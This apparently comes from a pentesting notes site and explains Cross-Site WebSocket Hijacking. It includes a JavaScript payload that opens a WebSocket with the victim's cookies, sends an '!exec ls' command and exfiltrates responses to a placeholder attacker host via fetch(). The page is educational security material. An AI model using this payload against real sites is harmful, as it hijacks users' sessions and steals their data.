Cross-Site WebSocket Hijacking (CSWSH)

Resources

portswigger CSWSH

This attack abuses a CSRF-like vulnerability in a WebSocket handshake.

If the server does not properly validate the Origin header or not required an CSRF token, any website can open a WebSocket connection on behalf of an authenticated victim.

The victim must be logged in on the target website (cookies/session are automatically included).
When the victim visits the attacker’s page, their browser executes malicious JavaScript that opens a WebSocket to the vulnerable server.
The attacker can then send arbitrary commands using the victim’s privileges and exfiltrate responses.

var ws = new WebSocket("ws://server/endpoint");

ws.onopen = function () {
  ws.send("!exec ls"); // If people has required right, he can execute command
};

ws.onmessage = function (event) {
  fetch("https://x.x.x.x/?q=" + event.data, {
    mode: "no-cors",
  });
};

Attack flow

The attacker hosts this script on a malicious website.
The victim (already authenticated on the target site) visits the attacker's page.
The browser opens a WebSocket to the vulnerable site, including the victim's cookies.
Commands are executed as the victim, and the results are exfiltrated to the attacker.

Hashcat

Privilege Escalation

Recon

Nmap

53 DNS

DNS Attack

Databases

File Inclusion

Injection

SQL Injection

XSS Injection

Json Web Token

AD Enumeration

Kerberos

Post Exploit

Relays Attacks

Tools

Cross-Site WebSocket Hijacking (CSWSH)

Resources

Attack flow

Hashcat

Nmap

53 DNS

DNS Attack

SQL Injection

XSS Injection

Json Web Token

Kerberos

Post Exploit

Cross-Site WebSocket Hijacking (CSWSH) ​

Resources ​

Attack flow ​

Cross-Site WebSocket Hijacking (CSWSH)

Resources

Attack flow